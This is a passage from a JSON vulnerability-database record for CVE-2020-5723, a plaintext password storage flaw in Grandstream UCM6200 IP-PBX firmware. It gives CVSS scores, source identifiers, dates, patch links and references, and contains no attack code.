                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:grandstream:ucm6208_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          }
        ]
      },
      "cve": "CVE-2020-5723",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-5723",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003514",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2020-20679",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-5723",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-003514",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-5723",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-003514",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-20679",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202003-1713",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-5723",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The UCM6200 series 1.0.20.22 and below stores unencrypted user passwords in an SQLite database. This could allow an attacker to retrieve all passwords and possibly gain elevated privileges. UCM6200 The series contains a vulnerability in the plaintext storage of important information.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 series 1.0.20.22 and previous versions have security vulnerabilities",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-5723",
            "trust": 3.1
          },
          {
            "db": "TENABLE",
            "id": "TRA-2020-17",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "id": "VAR-202003-1436",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          }
        ],
        "trust": 1.45714287
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          }
        ]
      },
      "last_update_date": "2024-11-23T22:25:34.279000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "UCM6200 series",
            "trust": 0.8,
            "url": "http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series"
          },
          {
            "title": "Patch for Grandstream UCM6200 privilege elevation vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/211855"
          },
          {
            "title": "Grandstream UCM6200 Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=113108"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-312",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.5,
            "url": "https://www.tenable.com/security/research/tra-2020-17"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5723"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5723"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/312.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-03-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "date": "2020-04-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "date": "2020-03-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "date": "2020-03-30T20:15:19.883000",
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-04-01T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-20679"
          },
          {
            "date": "2020-04-01T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-5723"
          },
          {
            "date": "2020-04-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          },
          {
            "date": "2020-04-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          },
          {
            "date": "2024-11-21T05:34:29.200000",
            "db": "NVD",
            "id": "CVE-2020-5723"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "UCM6200 Vulnerability in plaintext storage of important information in series",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-003514"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202003-1713"
          }
        ],
        "trust": 0.6
      }
    }